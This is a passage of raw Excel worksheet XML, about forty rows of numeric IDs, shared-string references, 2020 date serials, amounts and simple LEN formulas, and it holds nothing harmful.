      </c>
      <c r="J1017" t="s">
        <v>9427</v>
      </c>
      <c r="K1017">
        <f>LEN(I1017)</f>
        <v>0</v>
      </c>
      <c r="L1017">
        <f>LEN(J1017)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1018" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1018">
        <v>20589</v>
      </c>
      <c r="B1018">
        <v>1000</v>
      </c>
      <c r="C1018" t="s">
        <v>3012</v>
      </c>
      <c r="D1018" t="s">
        <v>10831</v>
      </c>
      <c r="E1018">
        <v>4</v>
      </c>
      <c r="F1018" t="s">
        <v>9640</v>
      </c>
      <c r="G1018" s="1">
        <v>44055</v>
      </c>
      <c r="H1018">
        <v>1800</v>
      </c>
      <c r="J1018" t="s">
        <v>9427</v>
      </c>
      <c r="K1018">
        <f>LEN(I1018)</f>
        <v>0</v>
      </c>
      <c r="L1018">
        <f>LEN(J1018)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1019" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1019">
        <v>20590</v>
      </c>
      <c r="B1019">
        <v>1000</v>
      </c>
      <c r="C1019" t="s">
        <v>3012</v>
      </c>
      <c r="D1019" t="s">
        <v>10831</v>
      </c>
      <c r="E1019">
        <v>4</v>
      </c>
      <c r="F1019" t="s">
        <v>9466</v>
      </c>
      <c r="G1019" s="1">
        <v>44055</v>
      </c>
      <c r="H1019">
        <v>9000</v>
      </c>
      <c r="J1019" t="s">
        <v>9427</v>
      </c>
      <c r="K1019">
        <f>LEN(I1019)</f>
        <v>0</v>
      </c>
      <c r="L1019">
        <f>LEN(J1019)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1020" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1020">
        <v>20633</v>
      </c>
      <c r="B1020">
        <v>768</v>
      </c>
      <c r="C1020" t="s">
        <v>1113</v>
      </c>
      <c r="D1020" t="s">
        <v>10856</v>
      </c>
      <c r="E1020">
        <v>16</v>
      </c>
      <c r="F1020" t="s">
        <v>10862</v>
      </c>
      <c r="G1020" s="1">
        <v>44032</v>
      </c>
      <c r="H1020">
        <v>6000</v>
      </c>
      <c r="J1020" t="s">
        <v>9427</v>
      </c>
      <c r="K1020">
        <f>LEN(I1020)</f>
        <v>0</v>
      </c>
      <c r="L1020">
        <f>LEN(J1020)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1021" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1021">
        <v>20729</v>
      </c>
      <c r="B1021">
        <v>881</v>
      </c>
      <c r="C1021" t="s">
        <v>3043</v>
      </c>
      <c r="D1021" t="s">
        <v>10939</v>
      </c>
      <c r="E1021">
        <v>2</v>
      </c>
      <c r="F1021" t="s">
        <v>10941</v>
      </c>
      <c r="G1021" s="1">
        <v>43994</v>
      </c>
      <c r="H1021">
        <v>100000</v>
      </c>
      <c r="J1021" t="s">
        <v>9427</v>
      </c>
      <c r="K1021">
        <f>LEN(I1021)</f>
        <v>0</v>
      </c>
      <c r="L1021">
        <f>LEN(J1021)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1022" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1022">
        <v>20731</v>
      </c>
      <c r="B1022">
        <v>881</v>
      </c>
      <c r="C1022" t="s">
        <v>3043</v>
      </c>
      <c r="D1022" t="s">
        <v>10939</v>
      </c>
      <c r="E1022">
        <v>2</v>
      </c>
      <c r="F1022" t="s">
        <v>9941</v>
      </c>
      <c r="G1022" s="1">
        <v>43994</v>
      </c>
      <c r="H1022">
        <v>40000</v>
      </c>
      <c r="J1022" t="s">
        <v>10330</v>
      </c>
      <c r="K1022">
        <f>LEN(I1022)</f>
        <v>0</v>
      </c>
      <c r="L1022">
        <f>LEN(J1022)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1023" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1023">
        <v>20733</v>
      </c>
      <c r="B1023">
        <v>881</v>
      </c>
      <c r="C1023" t="s">
        <v>3043</v>
      </c>
      <c r="D1023" t="s">
        <v>10939</v>
      </c>
      <c r="E1023">
        <v>2</v>
      </c>
      <c r="F1023" t="s">
        <v>9595</v>
      </c>
      <c r="G1023" s="1">
        <v>43994</v>
      </c>
      <c r="H1023">
        <v>40000</v>
      </c>
      <c r="J1023" t="s">
        <v>9427</v>
      </c>
      <c r="K1023">
        <f>LEN(I1023)</f>
        <v>0</v>
      </c>
      <c r="L1023">
        <f>LEN(J1023)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1024" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1024">
        <v>20768</v>
      </c>
      <c r="B1024">
        <v>2596</v>
      </c>
      <c r="C1024" t="s">
        <v>6018</v>
      </c>
      <c r="D1024" t="s">
        <v>10967</v>
      </c>
      <c r="E1024">
        <v>1</v>
      </c>
      <c r="F1024" t="s">
        <v>1746</v>
      </c>
      <c r="G1024" s="1">
        <v>44131</v>
      </c>
      <c r="H1024">
        <v>150000</v>
      </c>
      <c r="J1024" t="s">
        <v>9427</v>
      </c>
      <c r="K1024">
        <f>LEN(I1024)</f>
        <v>0</v>
      </c>
      <c r="L1024">
        <f>LEN(J1024)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1025" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1025">
        <v>20771</v>
      </c>
      <c r="B1025">
        <v>656</v>
      </c>
      <c r="C1025" t="s">
        <v>680</v>
      </c>
      <c r="D1025" t="s">
        <v>10418</v>
      </c>
      <c r="E1025">
        <v>2</v>
      </c>
      <c r="F1025" t="s">
        <v>7057</v>
      </c>
      <c r="G1025" s="1">
        <v>43966</v>
      </c>
      <c r="H1025">
        <v>365000</v>
      </c>
      <c r="J1025" t="s">
        <v>9427</v>
      </c>
      <c r="K1025">
        <f>LEN(I1025)</f>
        <v>0</v>
      </c>
      <c r="L1025">
        <f>LEN(J1025)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1026" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1026">
        <v>20772</v>
      </c>
      <c r="B1026">
        <v>656</v>
      </c>
      <c r="C1026" t="s">
        <v>680</v>
      </c>
      <c r="D1026" t="s">
        <v>10418</v>
      </c>
      <c r="E1026">
        <v>2</v>
      </c>
      <c r="F1026" t="s">
        <v>764</v>
      </c>
      <c r="G1026" s="1">
        <v>43966</v>
      </c>
      <c r="H1026">
        <v>183000</v>
      </c>
      <c r="J1026" t="s">
        <v>9427</v>
      </c>
      <c r="K1026">
        <f>LEN(I1026)</f>
        <v>0</v>
      </c>
      <c r="L1026">
        <f>LEN(J1026)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1027" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1027">
        <v>20822</v>
      </c>
      <c r="B1027">
        <v>800</v>
      </c>
      <c r="C1027" t="s">
        <v>1087</v>
      </c>
      <c r="D1027" t="s">
        <v>11010</v>
      </c>
      <c r="E1027">
        <v>16</v>
      </c>
      <c r="F1027" t="s">
        <v>9437</v>
      </c>
      <c r="G1027" s="1">
        <v>43977</v>
      </c>
      <c r="H1027">
        <v>27500</v>
      </c>
      <c r="J1027" t="s">
        <v>10330</v>
      </c>
      <c r="K1027">
        <f>LEN(I1027)</f>
        <v>0</v>
      </c>
      <c r="L1027">
        <f>LEN(J1027)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1028" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1028">
        <v>20823</v>
      </c>
      <c r="B1028">
        <v>800</v>
      </c>
      <c r="C1028" t="s">
        <v>1087</v>
      </c>
      <c r="D1028" t="s">
        <v>11010</v>
      </c>
      <c r="E1028">
        <v>16</v>
      </c>
      <c r="F1028" t="s">
        <v>9460</v>
      </c>
      <c r="G1028" s="1">
        <v>43977</v>
      </c>
      <c r="H1028">
        <v>65000</v>
      </c>
      <c r="J1028" t="s">
        <v>9427</v>
      </c>
      <c r="K1028">
        <f>LEN(I1028)</f>
        <v>0</v>
      </c>
      <c r="L1028">
        <f>LEN(J1028)</f>
        <v>8</v>
      </c>
    </row>
    <row r="1029" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1029">
        <v>19361</v>
      </c>
      <c r="B1029">
        <v>590</v>
      </c>
      <c r="C1029" t="s">
        <v>9958</v>
      </c>
      <c r="D1029" t="s">
        <v>9959</v>
      </c>
      <c r="E1029">
        <v>26</v>
      </c>
      <c r="F1029" t="s">
        <v>2236</v>
      </c>
      <c r="G1029" s="1">
        <v>43871</v>
      </c>
      <c r="H1029">
        <v>78000</v>
      </c>
      <c r="I1029" t="s">
        <v>9550</v>
      </c>
      <c r="J1029" t="s">
        <v>9960</v>
      </c>
      <c r="K1029">
        <f>LEN(I1029)</f>
        <v>18</v>
      </c>
      <c r="L1029">
        <f>LEN(J1029)</f>
        <v>7</v>
      </c>
    </row>
    <row r="1030" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1030">
        <v>19559</v>
      </c>
      <c r="B1030">
        <v>2331</v>
      </c>
      <c r="C1030" t="s">
        <v>5205</v>
      </c>
      <c r="D1030" t="s">
        <v>10099</v>
      </c>
      <c r="E1030">
        <v>26</v>
      </c>
      <c r="F1030" t="s">
        <v>9437</v>
      </c>
      <c r="G1030" s="1">
        <v>43909</v>
      </c>
      <c r="H1030">
        <v>75000</v>
      </c>
      <c r="I1030" t="s">
        <v>9550</v>
      </c>
      <c r="J1030" t="s">
        <v>10104</v>
      </c>
      <c r="K1030">
        <f>LEN(I1030)</f>
        <v>18</v>
      </c>
      <c r="L1030">
        <f>LEN(J1030)</f>
        <v>7</v>
      </c>
    </row>
    <row r="1031" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1031">
        <v>19458</v>
      </c>
      <c r="B1031">
        <v>2337</v>
      </c>
      <c r="C1031" t="s">
        <v>5129</v>
      </c>
      <c r="D1031" t="s">
        <v>10053</v>
      </c>
      <c r="E1031">
        <v>12</v>
      </c>
      <c r="F1031" t="s">
        <v>9459</v>
      </c>
      <c r="G1031" s="1">
        <v>44011</v>
      </c>
      <c r="H1031">
        <v>7000</v>
      </c>
      <c r="J1031" t="s">
        <v>10061</v>
      </c>
      <c r="K1031">
        <f>LEN(I1031)</f>
        <v>0</v>
      </c>
      <c r="L1031">
        <f>LEN(J1031)</f>
        <v>7</v>
      </c>
    </row>
    <row r="1032" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1032">
        <v>19584</v>
      </c>
      <c r="B1032">
        <v>2590</v>
      </c>
      <c r="C1032" t="s">
        <v>4375</v>
      </c>
      <c r="D1032" t="s">
        <v>10106</v>
      </c>
      <c r="E1032">
        <v>12</v>
      </c>
      <c r="F1032" t="s">
        <v>4950</v>
      </c>
      <c r="G1032" s="1">
        <v>43865</v>
      </c>
      <c r="H1032">
        <v>400000</v>
      </c>
      <c r="J1032" t="s">
        <v>10109</v>
      </c>
      <c r="K1032">
        <f>LEN(I1032)</f>
        <v>0</v>
      </c>
      <c r="L1032">
        <f>LEN(J1032)</f>
        <v>7</v>
      </c>
    </row>
    <row r="1033" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1033">
        <v>20743</v>
      </c>
      <c r="B1033">
        <v>256</v>
      </c>
      <c r="C1033" t="s">
        <v>1009</v>
      </c>
      <c r="D1033" t="s">
        <v>10953</v>
      </c>
      <c r="E1033">
        <v>16</v>
      </c>
      <c r="F1033" t="s">
        <v>4950</v>
      </c>
      <c r="G1033" s="1">
        <v>43971</v>
      </c>
      <c r="H1033">
        <v>34000</v>
      </c>
      <c r="J1033" t="s">
        <v>10109</v>
      </c>
      <c r="K1033">
        <f>LEN(I1033)</f>
        <v>0</v>
      </c>
      <c r="L1033">
        <f>LEN(J1033)</f>
        <v>7</v>
      </c>
    </row>
    <row r="1034" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1034">
        <v>20909</v>
      </c>
      <c r="B1034">
        <v>227</v>
      </c>
      <c r="C1034" t="s">
        <v>671</v>
      </c>
      <c r="D1034" t="s">
        <v>11054</v>
      </c>
      <c r="E1034">
        <v>16</v>
      </c>
      <c r="F1034" t="s">
        <v>4950</v>
      </c>
      <c r="G1034" s="1">
        <v>43971</v>
      </c>
      <c r="H1034">
        <v>936000</v>
      </c>
      <c r="J1034" t="s">
        <v>10109</v>
      </c>
      <c r="K1034">
        <f>LEN(I1034)</f>
        <v>0</v>
      </c>
      <c r="L1034">
        <f>LEN(J1034)</f>
        <v>7</v>
      </c>
    </row>
    <row r="1035" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1035">
        <v>21125</v>
      </c>
      <c r="B1035">
        <v>895</v>
      </c>
      <c r="C1035" t="s">
        <v>3150</v>
      </c>
      <c r="D1035" t="s">
        <v>11158</v>
      </c>
      <c r="E1035">
        <v>16</v>
      </c>
      <c r="F1035" t="s">
        <v>4950</v>
      </c>
      <c r="G1035" s="1">
        <v>44048</v>
      </c>
      <c r="H1035">
        <v>297652</v>
      </c>
      <c r="J1035" t="s">
        <v>10109</v>
      </c>
      <c r="K1035">
        <f>LEN(I1035)</f>
        <v>0</v>
      </c>
      <c r="L1035">
        <f>LEN(J1035)</f>
        <v>7</v>
      </c>
    </row>
    <row r="1036" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1036">
        <v>19370</v>
      </c>
      <c r="B1036">
        <v>2524</v>
      </c>
      <c r="C1036" t="s">
        <v>4948</v>
      </c>
      <c r="D1036" t="s">
        <v>9972</v>
      </c>
      <c r="E1036">
        <v>14</v>
      </c>
      <c r="F1036" t="s">
        <v>4950</v>
      </c>
      <c r="G1036" s="1">
        <v>43962</v>
      </c>
      <c r="H1036">
        <v>50000</v>
      </c>
      <c r="J1036" t="s">
        <v>9973</v>
      </c>
      <c r="K1036">
        <f>LEN(I1036)</f>
        <v>0</v>
      </c>
      <c r="L1036">
        <f>LEN(J1036)</f>
        <v>6</v>
      </c>
    </row>
    <row r="1037" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1037">
        <v>19457</v>
      </c>
      <c r="B1037">
        <v>2337</v>
      </c>
      <c r="C1037" t="s">
        <v>5129</v>
      </c>
      <c r="D1037" t="s">
        <v>10053</v>
      </c>
      <c r="E1037">
        <v>12</v>
      </c>
      <c r="F1037" t="s">
        <v>10060</v>
      </c>
      <c r="G1037" s="1">
        <v>44011</v>
      </c>
      <c r="H1037">
        <v>80000</v>
      </c>
      <c r="J1037" t="s">
        <v>9973</v>
      </c>
      <c r="K1037">
        <f>LEN(I1037)</f>
        <v>0</v>
      </c>
      <c r="L1037">
        <f>LEN(J1037)</f>
        <v>6</v>
      </c>
    </row>
    <row r="1038" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1038">
        <v>20423</v>
      </c>
      <c r="B1038">
        <v>244</v>
      </c>
      <c r="C1038" t="s">
        <v>16346</v>
      </c>
      <c r="D1038" t="s">
        <v>16347</v>
      </c>
      <c r="E1038">
        <v>16</v>
      </c>
      <c r="F1038" t="s">
        <v>4950</v>
      </c>
      <c r="G1038" s="1">
        <v>43977</v>
      </c>
      <c r="H1038" s="4">
        <v>450000</v>
      </c>
      <c r="J1038" t="s">
        <v>9973</v>
      </c>
      <c r="K1038">
        <f>LEN(I1038)</f>
        <v>0</v>
      </c>
      <c r="L1038">
        <f>LEN(J1038)</f>
        <v>6</v>
      </c>
    </row>
    <row r="1039" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1039">
        <v>20700</v>
      </c>
      <c r="B1039">
        <v>2732</v>
      </c>
      <c r="C1039" t="s">
        <v>16348</v>
      </c>
      <c r="D1039" t="s">
        <v>16349</v>
      </c>
      <c r="E1039">
        <v>9</v>
      </c>
      <c r="F1039" t="s">
        <v>4950</v>
      </c>
      <c r="G1039" s="1">
        <v>44013</v>
      </c>
      <c r="H1039" s="4">
        <v>212001</v>
      </c>
      <c r="J1039" t="s">
        <v>9973</v>
      </c>
      <c r="K1039">
        <f>LEN(I1039)</f>
        <v>0</v>
      </c>
      <c r="L1039">
        <f>LEN(J1039)</f>
        <v>6</v>
      </c>
    </row>
    <row r="1040" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1040">
        <v>20701</v>
      </c>
      <c r="B1040">
        <v>2732</v>
      </c>
      <c r="C1040" t="s">
        <v>6983</v>
      </c>
      <c r="D1040" t="s">
        <v>10902</v>
      </c>
      <c r="E1040">
        <v>9</v>
      </c>
      <c r="F1040" t="s">
        <v>10903</v>
      </c>
      <c r="G1040" s="1">
        <v>44013</v>
      </c>
      <c r="H1040">
        <v>7000</v>
      </c>
      <c r="J1040" t="s">
        <v>9973</v>
      </c>
      <c r="K1040">
        <f>LEN(I1040)</f>
        <v>0</v>
      </c>
      <c r="L1040">
        <f>LEN(J1040)</f>
        <v>6</v>
      </c>
    </row>
    <row r="1041" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1041">
        <v>21176</v>
      </c>
      <c r="B1041">
        <v>743</v>
      </c>
      <c r="C1041" t="s">
        <v>905</v>
      </c>
      <c r="D1041" t="s">
        <v>11189</v>
      </c>
      <c r="E1041">
        <v>16</v>
      </c>
      <c r="F1041" t="s">
        <v>9437</v>
      </c>
      <c r="G1041" s="1">
        <v>44159</v>
      </c>
      <c r="H1041">
        <v>70000</v>
      </c>
      <c r="J1041" t="s">
        <v>11190</v>
      </c>
      <c r="K1041">
        <f>LEN(I1041)</f>
        <v>0</v>
      </c>
      <c r="L1041">
        <f>LEN(J1041)</f>
        <v>6</v>
      </c>
    </row>
    <row r="1042" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1042">
        <v>19583</v>
      </c>
      <c r="B1042">
        <v>2590</v>
      </c>
      <c r="C1042" t="s">
        <v>4375</v>
      </c>
      <c r="D1042" t="s">
        <v>10106</v>
      </c>
      <c r="E1042">
        <v>12</v>
      </c>
      <c r="F1042" t="s">
        <v>9437</v>
      </c>
      <c r="G1042" s="1">
        <v>43865</v>
      </c>
      <c r="H1042">
        <v>250000</v>
      </c>
      <c r="I1042" t="s">
        <v>10108</v>
      </c>
      <c r="J1042" t="s">
        <v>9478</v>
      </c>
      <c r="K1042">
        <f>LEN(I1042)</f>
        <v>257</v>
      </c>
      <c r="L1042">
        <f>LEN(J1042)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1043" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1043">
        <v>19736</v>
      </c>
      <c r="B1043">
        <v>2564</v>
      </c>
      <c r="C1043" t="s">
        <v>5276</v>
      </c>
      <c r="D1043" t="s">
        <v>10210</v>
      </c>
      <c r="E1043">
        <v>12</v>
      </c>
      <c r="F1043" t="s">
        <v>9561</v>
      </c>
      <c r="G1043" s="1">
        <v>43885</v>
      </c>
      <c r="H1043">
        <v>0</v>
      </c>
      <c r="I1043" t="s">
        <v>10211</v>
      </c>
      <c r="J1043" t="s">
        <v>9456</v>
      </c>
      <c r="K1043">
        <f>LEN(I1043)</f>
        <v>130</v>
      </c>
      <c r="L1043">
        <f>LEN(J1043)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1044" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1044">
        <v>21242</v>
      </c>
      <c r="B1044">
        <v>46</v>
      </c>
      <c r="C1044" t="s">
        <v>658</v>
      </c>
      <c r="D1044" t="s">
        <v>10470</v>
      </c>
      <c r="E1044">
        <v>12</v>
      </c>
      <c r="F1044" t="s">
        <v>9925</v>
      </c>
      <c r="G1044" s="1">
        <v>44040</v>
      </c>
      <c r="H1044">
        <v>0</v>
      </c>
      <c r="I1044" t="s">
        <v>11238</v>
      </c>
      <c r="J1044" t="s">
        <v>9478</v>
      </c>
      <c r="K1044">
        <f>LEN(I1044)</f>
        <v>115</v>
      </c>
      <c r="L1044">
        <f>LEN(J1044)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1045" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1045">
        <v>20031</v>
      </c>
      <c r="B1045">
        <v>2621</v>
      </c>
      <c r="C1045" t="s">
        <v>5461</v>
      </c>
      <c r="D1045" t="s">
        <v>10410</v>
      </c>
      <c r="E1045">
        <v>16</v>
      </c>
      <c r="F1045" t="s">
        <v>132</v>
      </c>
      <c r="G1045" s="1">
        <v>43952</v>
      </c>
      <c r="H1045">
        <v>120000</v>
      </c>
      <c r="I1045" t="s">
        <v>10411</v>
      </c>
      <c r="J1045" t="s">
        <v>10412</v>
      </c>
      <c r="K1045">
        <f>LEN(I1045)</f>
        <v>102</v>
      </c>
      <c r="L1045">
        <f>LEN(J1045)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1046" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1046">
        <v>20944</v>
      </c>
      <c r="B1046">
        <v>929</v>
      </c>
      <c r="C1046" t="s">
        <v>3095</v>
      </c>
      <c r="D1046" t="s">
        <v>11064</v>
      </c>
      <c r="E1046">
        <v>16</v>
      </c>
      <c r="F1046" t="s">
        <v>11065</v>
      </c>
      <c r="G1046" s="1">
        <v>44000</v>
      </c>
      <c r="H1046">
        <v>1000000</v>
      </c>
      <c r="I1046" t="s">
        <v>11066</v>
      </c>
      <c r="J1046" t="s">
        <v>9456</v>
      </c>
      <c r="K1046">
        <f>LEN(I1046)</f>
        <v>73</v>
      </c>
      <c r="L1046">
        <f>LEN(J1046)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1047" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1047">
        <v>19446</v>
      </c>
      <c r="B1047">
        <v>2573</v>
      </c>
      <c r="C1047" t="s">
        <v>5094</v>
      </c>
      <c r="D1047" t="s">
        <v>10047</v>
      </c>
      <c r="E1047">
        <v>12</v>
      </c>
      <c r="F1047" t="s">
        <v>10048</v>
      </c>
      <c r="G1047" s="1">
        <v>44103</v>
      </c>
      <c r="H1047">
        <v>50000</v>
      </c>
      <c r="I1047" t="s">
        <v>10049</v>
      </c>
      <c r="J1047" t="s">
        <v>9456</v>
      </c>
      <c r="K1047">
        <f>LEN(I1047)</f>
        <v>69</v>
      </c>
      <c r="L1047">
        <f>LEN(J1047)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1048" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1048">
        <v>21370</v>
      </c>
      <c r="B1048">
        <v>469</v>
      </c>
      <c r="C1048" t="s">
        <v>1626</v>
      </c>
      <c r="D1048" t="s">
        <v>11336</v>
      </c>
      <c r="E1048">
        <v>12</v>
      </c>
      <c r="F1048" t="s">
        <v>11339</v>
      </c>
      <c r="G1048" s="1">
        <v>44075</v>
      </c>
      <c r="H1048">
        <v>90000</v>
      </c>
      <c r="I1048" t="s">
        <v>11340</v>
      </c>
      <c r="J1048" t="s">
        <v>9456</v>
      </c>
      <c r="K1048">
        <f>LEN(I1048)</f>
        <v>54</v>
      </c>
      <c r="L1048">
        <f>LEN(J1048)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1049" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1049">
        <v>20942</v>
      </c>
      <c r="B1049">
        <v>374</v>
      </c>
      <c r="C1049" t="s">
        <v>16350</v>
      </c>
      <c r="D1049" t="s">
        <v>16351</v>
      </c>
      <c r="E1049">
        <v>16</v>
      </c>
      <c r="F1049" t="s">
        <v>9598</v>
      </c>
      <c r="G1049" s="1">
        <v>43966</v>
      </c>
      <c r="H1049" s="4">
        <v>44000</v>
      </c>
      <c r="I1049" t="s">
        <v>10334</v>
      </c>
      <c r="J1049" t="s">
        <v>9478</v>
      </c>
      <c r="K1049">
        <f>LEN(I1049)</f>
        <v>48</v>
      </c>
      <c r="L1049">
        <f>LEN(J1049)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1050" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1050">
        <v>20204</v>
      </c>
      <c r="B1050">
        <v>2701</v>
      </c>
      <c r="C1050" t="s">
        <v>5717</v>
      </c>
      <c r="D1050" t="s">
        <v>10545</v>
      </c>
      <c r="E1050">
        <v>12</v>
      </c>
      <c r="F1050" t="s">
        <v>609</v>
      </c>
      <c r="G1050" s="1">
        <v>43964</v>
      </c>
      <c r="H1050">
        <v>0</v>
      </c>
      <c r="I1050" t="s">
        <v>10546</v>
      </c>
      <c r="J1050" t="s">
        <v>9456</v>
      </c>
      <c r="K1050">
        <f>LEN(I1050)</f>
        <v>38</v>
      </c>
      <c r="L1050">
        <f>LEN(J1050)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1051" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1051">
        <v>20945</v>
      </c>
      <c r="B1051">
        <v>929</v>
      </c>
      <c r="C1051" t="s">
        <v>3095</v>
      </c>
      <c r="D1051" t="s">
        <v>11064</v>
      </c>
      <c r="E1051">
        <v>16</v>
      </c>
      <c r="F1051" t="s">
        <v>11067</v>
      </c>
      <c r="G1051" s="1">
        <v>44000</v>
      </c>
      <c r="H1051">
        <v>1000000</v>
      </c>
      <c r="I1051" t="s">
        <v>11068</v>
      </c>
      <c r="J1051" t="s">
        <v>9456</v>
      </c>
      <c r="K1051">
        <f>LEN(I1051)</f>
        <v>36</v>
      </c>
      <c r="L1051">
        <f>LEN(J1051)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1052" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1052">
        <v>19402</v>
      </c>
      <c r="B1052">
        <v>2347</v>
      </c>
      <c r="C1052" t="s">
        <v>5074</v>
      </c>
      <c r="D1052" t="s">
        <v>9897</v>
      </c>
      <c r="E1052">
        <v>31</v>
      </c>
      <c r="F1052" t="s">
        <v>9437</v>
      </c>
      <c r="G1052" s="1">
        <v>43867</v>
      </c>
      <c r="H1052">
        <v>0</v>
      </c>
      <c r="I1052" t="s">
        <v>10003</v>
      </c>
      <c r="J1052" t="s">
        <v>9478</v>
      </c>
      <c r="K1052">
        <f>LEN(I1052)</f>
        <v>33</v>
      </c>
      <c r="L1052">
        <f>LEN(J1052)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1053" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1053">
        <v>19403</v>
      </c>
      <c r="B1053">
        <v>2347</v>
      </c>
      <c r="C1053" t="s">
        <v>5074</v>
      </c>
      <c r="D1053" t="s">
        <v>9897</v>
      </c>
      <c r="E1053">
        <v>31</v>
      </c>
      <c r="F1053" t="s">
        <v>9527</v>
      </c>
      <c r="G1053" s="1">
        <v>43867</v>
      </c>
      <c r="H1053">
        <v>0</v>
      </c>
      <c r="I1053" t="s">
        <v>10003</v>
      </c>
      <c r="J1053" t="s">
        <v>9478</v>
      </c>
      <c r="K1053">
        <f>LEN(I1053)</f>
        <v>33</v>
      </c>
      <c r="L1053">
        <f>LEN(J1053)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1054" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1054">
        <v>20066</v>
      </c>
      <c r="B1054">
        <v>2661</v>
      </c>
      <c r="C1054" t="s">
        <v>3761</v>
      </c>
      <c r="D1054" t="s">
        <v>10451</v>
      </c>
      <c r="E1054">
        <v>32</v>
      </c>
      <c r="F1054" t="s">
        <v>4686</v>
      </c>
      <c r="G1054" s="1">
        <v>43908</v>
      </c>
      <c r="H1054">
        <v>10000</v>
      </c>
      <c r="I1054" t="s">
        <v>9899</v>
      </c>
      <c r="J1054" t="s">
        <v>9478</v>
      </c>
      <c r="K1054">
        <f>LEN(I1054)</f>
        <v>33</v>
      </c>
      <c r="L1054">
        <f>LEN(J1054)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1055" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1055">
        <v>20472</v>
      </c>
      <c r="B1055">
        <v>2555</v>
      </c>
      <c r="C1055" t="s">
        <v>5007</v>
      </c>
      <c r="D1055" t="s">
        <v>10740</v>
      </c>
      <c r="E1055">
        <v>31</v>
      </c>
      <c r="F1055" t="s">
        <v>3763</v>
      </c>
      <c r="G1055" s="1">
        <v>43948</v>
      </c>
      <c r="H1055">
        <v>10000</v>
      </c>
      <c r="I1055" t="s">
        <v>10010</v>
      </c>
      <c r="J1055" t="s">
        <v>9478</v>
      </c>
      <c r="K1055">
        <f>LEN(I1055)</f>
        <v>33</v>
      </c>
      <c r="L1055">
        <f>LEN(J1055)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1056" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1056">
        <v>20473</v>
      </c>
      <c r="B1056">
        <v>2555</v>
      </c>
      <c r="C1056" t="s">
        <v>5007</v>
      </c>
      <c r="D1056" t="s">
        <v>10740</v>
      </c>
      <c r="E1056">
        <v>31</v>
      </c>
      <c r="F1056" t="s">
        <v>6917</v>
      </c>
      <c r="G1056" s="1">
        <v>43948</v>
      </c>
      <c r="H1056">
        <v>10000</v>
      </c>
      <c r="I1056" t="s">
        <v>10010</v>
      </c>
      <c r="J1056" t="s">
        <v>9478</v>
      </c>
      <c r="K1056">
        <f>LEN(I1056)</f>
        <v>33</v>
      </c>
      <c r="L1056">
        <f>LEN(J1056)</f>
        <v>5</v>
      </c>
    </row>
    <row r="1057" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1057">
        <v>21199</v>
      </c>
      <c r="B1057">
        <v>2835</v>
      </c>
      <c r="C1057" t="s">
        <v>7104</v>
      </c>
      <c r="D1057" t="s">
        <v>11208</v>
      </c>
      <c r="E1057">
        <v>33</v>
      </c>
      <c r="F1057" t="s">
        <v>2236</v>
      </c>
      <c r="G1057" s="1">
        <v>44006</v>
      </c>
      <c r="H1057">
        <v>35000</v>
      </c>
      <c r="I1057" t="s">
        <v>9693</v>
      </c>
      <c r="J1057" t="s">
        <v>9456</v>
      </c>
      <c r="K1057">
        <f>LEN(I1057)</f>
        <v>33</v>
      </c>
      <c r="L1057">
